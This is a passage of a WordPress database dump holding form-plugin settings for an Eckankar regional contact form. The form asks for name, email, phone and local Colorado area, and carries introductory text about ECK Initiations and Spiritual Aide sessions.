spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.'),(7004,245,'desc_el','div','desc_el','div'),(7005,245,'show_desc','0','show_desc','0'),(7006,245,'desc_pos','none','desc_pos','none'),(7007,245,'desc_text','','desc_text',''),(7008,245,'element_class','','element_class',''),(7009,245,'default','<p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Southwest Mountain Area Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','default','<p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Southwest Mountain Area Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>'),(7010,245,'key','html_189','key','html_189'),(7011,245,'container_class','','container_class',''),(7012,245,'drawerDisabled','','drawerDisabled',''),(7013,245,'parent_id','23','parent_id','23'),(7014,246,'objectType','Field','objectType','Field'),(7015,246,'objectDomain','fields','objectDomain','fields'),(7016,246,'editActive','','editActive',''),(7017,246,'order','2','order','2'),(7018,246,'type','textbox','type','textbox'),(7019,246,'def_id','6','def_id','6'),(7020,246,'label','First Name','label','First Name'),(7021,246,'label_pos','above','label_pos','above'),(7022,246,'mask','','mask',''),(7023,246,'datepicker','0','datepicker','0'),(7024,246,'first_name','1','first_name','1'),(7025,246,'last_name','0','last_name','0'),(7026,246,'from_name','0','from_name','0'),(7027,246,'user_info_field_group','1','user_info_field_group','1'),(7028,246,'show_help','0','show_help','0'),(7029,246,'help_text','','help_text',''),(7030,246,'calc_auto_include','0','calc_auto_include','0'),(7031,246,'calc_option','0','calc_option','0'),(7032,246,'placeholder','','placeholder',''),(7033,246,'user_address_1','','user_address_1',''),(7034,246,'user_address_2','','user_address_2',''),(7035,246,'user_city','','user_city',''),(7036,246,'user_zip','','user_zip',''),(7037,246,'user_phone','','user_phone',''),(7038,246,'user_email','','user_email',''),(7039,246,'disable_input','0','disable_input','0'),(7040,246,'input_limit','','input_limit',''),(7041,246,'input_limit_type','char','input_limit_type','char'),(7042,246,'input_limit_msg','','input_limit_msg',''),(7043,246,'user_state','0','user_state','0'),(7044,246,'autocomplete_off','0','autocomplete_off','0'),(7045,246,'num_sort','0','num_sort','0'),(7046,246,'admin_label','','admin_label',''),(7047,246,'user_info_field_group_name','','user_info_field_group_name',''),(7048,246,'user_info_field_group_custom','','user_info_field_group_custom',''),(7049,246,'show_desc','0','show_desc','0'),(7050,246,'desc_pos','none','desc_pos','none'),(7051,246,'desc_text','','desc_text',''),(7052,246,'element_class','','element_class',''),(7053,246,'required','1','required','1'),(7054,246,'key','textbox_190','key','textbox_190'),(7055,246,'default','','default',''),(7056,246,'container_class','one-half first','container_class','one-half first'),(7057,246,'manual_key','','manual_key',''),(7058,246,'custom_mask','','custom_mask',''),(7059,246,'parent_id','23','parent_id','23'),(7060,247,'objectType','Field','objectType','Field'),(7061,247,'objectDomain','fields','objectDomain','fields'),(7062,247,'editActive','','editActive',''),(7063,247,'order','3','order','3'),(7064,247,'type','lastname','type','lastname'),(7065,247,'def_id','7','def_id','7'),(7066,247,'label','Last Name','label','Last Name'),(7067,247,'label_pos','above','label_pos','above'),(7068,247,'mask','','mask',''),(7069,247,'datepicker','0','datepicker','0'),(7070,247,'first_name','0','first_name','0'),(7071,247,'from_name','0','from_name','0'),(7072,247,'user_info_field_group','1','user_info_field_group','1'),(7073,247,'show_help','0','show_help','0'),(7074,247,'help_text','','help_text',''),(7075,247,'calc_auto_include','0','calc_auto_include','0'),(7076,247,'calc_option','0','calc_option','0'),(7077,247,'placeholder','','placeholder',''),(7078,247,'user_address_1','','user_address_1',''),(7079,247,'user_address_2','','user_address_2',''),(7080,247,'user_city','','user_city',''),(7081,247,'user_zip','','user_zip',''),(7082,247,'user_phone','','user_phone',''),(7083,247,'user_email','','user_email',''),(7084,247,'disable_input','0','disable_input','0'),(7085,247,'input_limit','','input_limit',''),(7086,247,'input_limit_type','char','input_limit_type','char'),(7087,247,'input_limit_msg','','input_limit_msg',''),(7088,247,'user_state','0','user_state','0'),(7089,247,'autocomplete_off','0','autocomplete_off','0'),(7090,247,'num_sort','0','num_sort','0'),(7091,247,'admin_label','','admin_label',''),(7092,247,'user_info_field_group_name','','user_info_field_group_name',''),(7093,247,'user_info_field_group_custom','','user_info_field_group_custom',''),(7094,247,'show_desc','0','show_desc','0'),(7095,247,'desc_pos','none','desc_pos','none'),(7096,247,'desc_text','','desc_text',''),(7097,247,'element_class','','element_class',''),(7098,247,'required','1','required','1'),(7099,247,'key','lastname_191','key','lastname_191'),(7100,247,'default','','default',''),(7101,247,'container_class','one-half','container_class','one-half'),(7102,247,'parent_id','23','parent_id','23'),(7103,248,'objectType','Field','objectType','Field'),(7104,248,'objectDomain','fields','objectDomain','fields'),(7105,248,'editActive','','editActive',''),(7106,248,'order','4','order','4'),(7107,248,'type','email','type','email'),(7108,248,'def_id','14','def_id','14'),(7109,248,'label','Email','label','Email'),(7110,248,'label_pos','above','label_pos','above'),(7111,248,'mask','','mask',''),(7112,248,'datepicker','0','datepicker','0'),(7113,248,'first_name','0','first_name','0'),(7114,248,'last_name','0','last_name','0'),(7115,248,'from_name','0','from_name','0'),(7116,248,'user_address_1','0','user_address_1','0'),(7117,248,'user_address_2','0','user_address_2','0'),(7118,248,'user_city','0','user_city','0'),(7119,248,'user_zip','0','user_zip','0'),(7120,248,'user_phone','0','user_phone','0'),(7121,248,'user_info_field_group','1','user_info_field_group','1'),(7122,248,'show_help','0','show_help','0'),(7123,248,'help_text','','help_text',''),(7124,248,'calc_auto_include','0','calc_auto_include','0'),(7125,248,'calc_option','0','calc_option','0'),(7126,248,'placeholder','','placeholder',''),(7127,248,'disable_input','0','disable_input','0'),(7128,248,'input_limit','','input_limit',''),(7129,248,'input_limit_type','char','input_limit_type','char'),(7130,248,'input_limit_msg','','input_limit_msg',''),(7131,248,'user_state','0','user_state','0'),(7132,248,'autocomplete_off','0','autocomplete_off','0'),(7133,248,'num_sort','0','num_sort','0'),(7134,248,'admin_label','','admin_label',''),(7135,248,'user_info_field_group_name','','user_info_field_group_name',''),(7136,248,'user_info_field_group_custom','','user_info_field_group_custom',''),(7137,248,'show_desc','0','show_desc','0'),(7138,248,'desc_pos','none','desc_pos','none'),(7139,248,'desc_text','','desc_text',''),(7140,248,'element_class','','element_class',''),(7141,248,'required','1','required','1'),(7142,248,'key','email_192','key','email_192'),(7143,248,'default','','default',''),(7144,248,'container_class','one-half first','container_class','one-half first'),(7145,248,'parent_id','23','parent_id','23'),(7146,249,'objectType','Field','objectType','Field'),(7147,249,'objectDomain','fields','objectDomain','fields'),(7148,249,'editActive','','editActive',''),(7149,249,'order','5','order','5'),(7150,249,'type','phone','type','phone'),(7151,249,'def_id','15','def_id','15'),(7152,249,'label','Phone','label','Phone'),(7153,249,'label_pos','above','label_pos','above'),(7154,249,'mask','(999) 999-9999','mask','(999) 999-9999'),(7155,249,'datepicker','0','datepicker','0'),(7156,249,'first_name','0','first_name','0'),(7157,249,'last_name','0','last_name','0'),(7158,249,'from_name','0','from_name','0'),(7159,249,'user_address_1','0','user_address_1','0'),(7160,249,'user_address_2','0','user_address_2','0'),(7161,249,'user_city','0','user_city','0'),(7162,249,'user_zip','0','user_zip','0'),(7163,249,'user_email','0','user_email','0'),(7164,249,'user_info_field_group','1','user_info_field_group','1'),(7165,249,'show_help','0','show_help','0'),(7166,249,'help_text','','help_text',''),(7167,249,'calc_auto_include','0','calc_auto_include','0'),(7168,249,'calc_option','0','calc_option','0'),(7169,249,'placeholder','','placeholder',''),(7170,249,'disable_input','0','disable_input','0'),(7171,249,'input_limit','','input_limit',''),(7172,249,'input_limit_type','char','input_limit_type','char'),(7173,249,'input_limit_msg','','input_limit_msg',''),(7174,249,'user_state','0','user_state','0'),(7175,249,'autocomplete_off','0','autocomplete_off','0'),(7176,249,'num_sort','0','num_sort','0'),(7177,249,'admin_label','','admin_label',''),(7178,249,'user_info_field_group_name','','user_info_field_group_name',''),(7179,249,'user_info_field_group_custom','','user_info_field_group_custom',''),(7180,249,'show_desc','0','show_desc','0'),(7181,249,'desc_pos','none','desc_pos','none'),(7182,249,'desc_text','','desc_text',''),(7183,249,'element_class','','element_class',''),(7184,249,'required','1','required','1'),(7185,249,'key','phone_193','key','phone_193'),(7186,249,'default','','default',''),(7187,249,'container_class','one-half','container_class','one-half'),(7188,249,'manual_key','','manual_key',''),(7189,249,'custom_mask','','custom_mask',''),(7190,249,'parent_id','23','parent_id','23'),(7191,250,'objectType','Field','objectType','Field'),(7192,250,'objectDomain','fields','objectDomain','fields'),(7193,250,'editActive','','editActive',''),(7194,250,'order','6','order','6'),(7195,250,'type','listselect','type','listselect'),(7196,250,'label','Your Local Area','label','Your Local Area'),(7197,250,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(7198,250,'label_pos','above','label_pos','above'),(7199,250,'list_type','dropdown','list_type','dropdown'),(7200,250,'multi_size','5','multi_size','5'),(7201,250,'list_show_value','1','list_show_value','1'),(7202,250,'list','a:0:{}','list','a:0:{}'),(7203,250,'user_info_field_group','','user_info_field_group',''),(7204,250,'calc_auto_include','0','calc_auto_include','0'),(7205,250,'user_state','0','user_state','0'),(7206,250,'num_sort','0','num_sort','0'),(7207,250,'admin_label','','admin_label',''),(7208,250,'show_help','0','show_help','0'),(7209,250,'help_text','','help_text',''),(7210,250,'show_desc','0','show_desc','0'),(7211,250,'desc_pos','none','desc_pos','none'),(7212,250,'desc_text','','desc_text',''),(7213,250,'element_class','','element_class',''),(7214,250,'required','1','required','1'),(7215,250,'options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 